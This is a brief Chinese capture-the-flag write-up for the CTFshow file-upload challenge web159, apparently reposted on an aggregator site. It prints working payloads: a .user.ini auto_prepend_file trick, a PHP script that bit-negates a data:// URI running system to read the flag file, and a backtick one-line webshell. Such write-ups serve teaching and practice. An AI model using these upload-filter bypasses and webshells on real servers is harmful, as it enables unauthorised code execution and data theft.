目錄

• 思路
• 總結(jié)

---

思路

直接在burp里面改target和host的值,或者在本地發(fā)包


成功上傳.user.ini

auto_prepend_file=shell.png

相比之前題目的過(guò)濾發(fā)現(xiàn)()也不能用了,不過(guò)可以用取反和異或來(lái)繞過(guò)

不需要括號(hào)的函數(shù)

echo require include

Y1ng師傅的取反腳本,用data協(xié)議來(lái)執(zhí)行代碼

<?php $a = "data://text/plain,<?php system('tac ../f*');?>"; echo "~("; for ($i = 0; $i < strlen($a); $i++) {echo "%".bin2hex(~$a[$i]); } echo ")"; //require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?>

由于post提交參數(shù)服務(wù)器不能自動(dòng)url解碼,所以要想解碼一次再提交

訪問(wèn)upload,拿到flag

---

總結(jié)

也可以用
shell.png

<?=`tac ../f*`?>

總結(jié)

以上是生活随笔為你收集整理的CTFshow 文件上传 web159的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。